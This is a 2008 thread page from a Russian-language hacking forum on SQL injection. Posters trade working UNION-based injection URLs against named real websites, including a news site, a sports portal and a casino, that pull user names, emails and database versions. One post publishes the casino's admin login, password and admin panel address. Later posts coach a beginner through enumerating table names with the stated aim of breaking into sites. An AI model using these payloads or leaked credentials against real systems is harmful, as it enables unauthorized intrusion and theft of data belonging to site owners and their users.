HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 585 из 1602 « Первая < 85485535575 581 582 583 584 585 586 587 588 589 59563568510851585 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 11.07.2008, 06:39
Dr.Frank
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
Провел на форуме:
1212427

Репутация: 187
По умолчанию
pr=6
www.bangkokpost.com
Код:
http://www.bangkokpost.com/breaking_news/breakingnews.php?id=-128097+union+select+1,2,3,4,5,6,name,8,9,email,11,12,13,14,15+from+users--
sify.com
Код:
http://sify.com/sports/football/fullstory.php?id=-14704106+union+select+1122,2222,3333,4444,version(),6666,7777,8888,999,1000,1100,1200,1300,1400,1500,1600,1700,1800--
pr=5
www.panoramablick.com
Код:
http://www.panoramablick.com/service4free.php?kat_id=3364&nav_id=-3364+union+select+1,2,3,4--&lang=en&action=showkat
 
Ответить с цитированием

  #2  
Старый 11.07.2008, 09:56
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559

Репутация: 2947


По умолчанию
www.creeknationcasino.com

SQL inj:
Цитата:
http://www.creeknationcasino.com/index.cfm?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at(managerlogin,char(58),managerpassword)+from+man agers/*
Цитата:
Логин: admin
Пароль: tr!@b
Админка:
Цитата:
http://www.creeknationcasino.com/admin/
 
Ответить с цитированием

  #3  
Старый 11.07.2008, 13:39
BanQui
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452

Репутация: 36
По умолчанию
slider слух у мну вопрос!Как ты вычислил ентот managerpassword и managerlogin ??? Методом тыка или как? Просто вот такой вот ссылкочкой например www.creeknationcasino.com/index.cfm?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at(column_name,0x3a,column_schema)+from+informatio n_schema.columns+limit+1,1/*
Мне ошибку пишет!!! Обьясни плиз я в этом деле новичек ((
 
Ответить с цитированием

  #4  
Старый 11.07.2008, 13:47
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
По умолчанию
2 BanQui
А что это у тебя за столбец column_schema?
Может нужно так ?
http://www.creeknationcasino.com/index.cfm?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at(column_name,0x3a,table_schema)+from+information _schema.columns+limit+1,1/*
Ошибки нету
 
Ответить с цитированием

  #5  
Старый 11.07.2008, 14:02
BanQui
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452

Репутация: 36
По умолчанию
СПс терь другой вопрос смари http://www.creeknationcasino.com/index.cfm?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at(column_name,0x3a,table_schema)+from+information _schema.columns+limit+1,1/* - Ошибки нет
http://www.creeknationcasino.com/index.cfm?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at(column_name,0x3a,table_schema)+from+information _schema.columns+limit+2,1/* - Ошибки нет
И так до 4 а вот тут
http://www.creeknationcasino.com/index.cfm?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at(column_name,0x3a,table_schema)+from+information _schema.columns+limit+5,1/* - Ошибка есть и дальше они тоже присутствуют!
 
Ответить с цитированием

  #6  
Старый 11.07.2008, 14:06
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию
мдауж, откуда ты взял этот table_schema ??? table_name!
 
Ответить с цитированием

  #7  
Старый 11.07.2008, 14:15
BanQui
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452

Репутация: 36
По умолчанию
Omg!Приношу свой извенения за свой тупизм)))))Спасибо!!! Вазьму на заметку ИМХО много раз отступал от взлома сайтоф именно по этому((
 
Ответить с цитированием

  #8  
Старый 11.07.2008, 14:18
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию
статьи для кого пишут? почитай чтобы в следующий раз "не отступать от взлома" ))
 
Ответить с цитированием

  #9  
Старый 11.07.2008, 14:31
BanQui
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452

Репутация: 36
По умолчанию
Кстати вот тут еще одну фигню нашел токо что то не получаетцо никак информатион схемку вывести! Версия 4.0.24_Debian-10sarge2-log
Вот как пытался и пытаюсь чтото менять но пока не выходит ((( http://www.audit.by/new/index.php?id=10&spr=-999999+union+select+1,2,table_name+from+informatio n_schema.tables+limit+1,1/*
 
Ответить с цитированием

  #10  
Старый 11.07.2008, 14:33
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию
см. мой совет выше ^-^
в 4.0.24 нет information_schema...
вапросы по уязвимостям тут, а то щас и тебе и мне минусов наставят...
 
Ответить с цитированием
Ответ
Страница 585 из 1602 « Первая < 85485535575 581 582 583 584 585 586 587 588 589 59563568510851585 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.